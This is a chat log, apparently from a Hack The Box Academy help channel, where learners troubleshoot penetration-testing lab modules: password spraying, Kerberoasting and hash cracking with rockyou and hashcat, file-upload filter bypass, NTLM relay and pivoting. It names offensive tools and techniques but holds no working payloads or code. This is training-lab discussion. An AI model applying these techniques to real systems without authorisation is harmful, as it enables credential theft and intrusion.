Can anyone give me a hint?
yes
This has been asked quite a lot, so I suggest first searching this channel for related questions as the information previously provided might help you. If not, you can then come back here and ask again.
Use the username wordlist created from the previous section Password Spraying - Making a Target User List.
My Apktool is "Apktool 2.12.0 - a tool for reengineering Android apk files
with smali 3.0.9 and baksmali 3.0.9".
I'll do what you say. Thank you.
Guys have a question, when I purchase a module, do I have to complete it on time, or will I retain ownership of the module indefinitely even if I do not complete it?
jsmith? yeah I'd been running it for like an hour and a half lmao
Hello im having an issue with SOC Path. Currently doing the Windows Event Logs module. Right on the first section after i instantiate the VM and spawn the target. It requires a login with xfreerdp (which i have done gazillion times in this life). I get this error thrown back after copying and pasting the command from the page and modifying the ip in order to connect. Btw the login was successful the first time, booted up a windows VM and after couple of seconds it shutdown and now throws this error
[10:45:37:165] [10651:10652] [ERROR][com.freerdp.core] - freerdp_tcp_is_hostname_resolvable:freerdp_set_last_error_ex ERRCONNECT_DNS_NAME_NOT_FOUND [0x00020005]
Maybe because there is no dot between 129 and 112?
tired today. missed that one out. anyways the target machine is now spawning for 6m straight so ill have to sit out and wait until it decides to work
Just checking all the rooms in Linux fundamentals is free right?
dm me
You mean sections? Yes, they are. In fact all tier 0 modules are free.
i am doing Attacking Enterprise Networks and everytime i try to open the ip in my firefox the ssh connection breakdown and show root@dmz01:~# channel 5: open failed: connect failed: Temporary failure in name resolution
please someone tell me how to fix as i have wasted 2 hrs plus and still stuck here
Hi guys i have a problem Fileupload whitelist filter i get the valid extension then after i send it and try to execute it response with 404 and one of them give me 403
Understand the module on whitelist filters and also you shouldn't get 4xx since you're just trying to upload a file
I know i didnt get 4xx when i upload i get it when i try to get the file after i uploaded it
It give me 403
Was able to get it - found the answer in the demo
Anyone done Android Penetration Testing Automation - Medusa - Bypassing Security Mechanisms? I'm stuck on Use the methods described in this section to retrieve any URIs used in the app. - not sure if I understand this question
Hey yall theres this site that i forgot that was basically a pw cracking site. It had hella passwords and usually ive heard people just upload their hashes there before they actually use hashcat. I was wondering what it was bc its been mentioned before in the modules. If anybody knows lmk pls!
your logic seems off here
also you shouldn't change any of the external conditions of the loop
also Intro to bash scripting is a t1 module
i believe you're thinking about crackstation?
i believe it's referenced in AD enum module or something
also: using echo without -n may be more useful
@silent isle ^^^ read above; the section gives you ways to do your count and such; don't stray far from what's shown
also conditions are in double brackets, not single [[ put condition like this ]]
yes thank you
Hello, i need some help with the HTTPs/TLS Attacks Skills assessment, can somebody help me?
Hey Everyone, working on the Password Attacks module Attacking Windows Credential Manager exercise. I can switch to mcharles and found the Administrator password and can open CMD as Admin, but I don't see mimikatz or any of the other tools from the section. What am I missing?
Hey guys, I'm stuck on the last question of the attacking kerberos skills assessment module. Could someone DM? Thanks.
hi chat, trying my luck again to solve this technical issue
module: Windows Attacks & Defense
chapter: Kerberoasting
issue: SSH to Kali gives timeout
What i've done: connected to the W11 machine through the Pwnbox, got TGS ticket with Rubeus han the description says:
We then need to move the extracted file with the tickets to the Kali Linux VM for cracking
how i tried to connect to the kali machine:
- ssh kali@172.16.18.20 from the W11 host (like written on the previous chapter "Overview")
- ssh kali@172.16.18.20 from the Pwnbox
- ssh kali@kali (yes i'm desperate)
- nmap the Pwnbox network to see if there is a kali host somewhere (very desperate)
- extract the hash from the spn.txt file to run it on crackstation and sorts (not the correct format)
first question of this chapter is "Connect to the target and perform a Kerberoasting attack. What is the password for the svc-iam user?" So i need to be able to run the dictionary attack on the extracted spn.txt file to be able to answer
PS: also tried rotating machines
I already told you yesterday, you don't remote into the kali box from your ws01 machine.
You either use the ws01 or your own kali/pwnbox as the attacker boxes
the 172. is an internal subnet and you won't be able to reach it from a VM unless you pivot through the pivot host
but the pwnbox does not have the passwords.txt file required in the chall
mentioned in the text*
it may be in rockyou, or just transfer the file over if you need
once you have the hash you can literally just copy it and paste it into the machine you're running hashcat on with the wordlist
sorry i do not know where is this rockyou folder
it'd be rockyou.txt and location depends on your attacker box. locate rockyou.txt or in kali it's zipped by default locate rockyou*
You can DM me if you want to show me screen shots and I can help
ah okay its a file
I also got the same problem, you are not able to capture certificate right?
I can't, I have an issue with ntlmrelayx and the printer
Sorry my type error
Pls read again
No I have the issue with ntlmrelayx it cant generate pfx
Feel free to DM me and I can help you
i'm trying once more before dming you
Same with me
In the pivoting module https://academy.hackthebox.com/module/158/section/1426, I tried using msf's rdp_scanner on the target with proxychain but got an error. Anybody know why?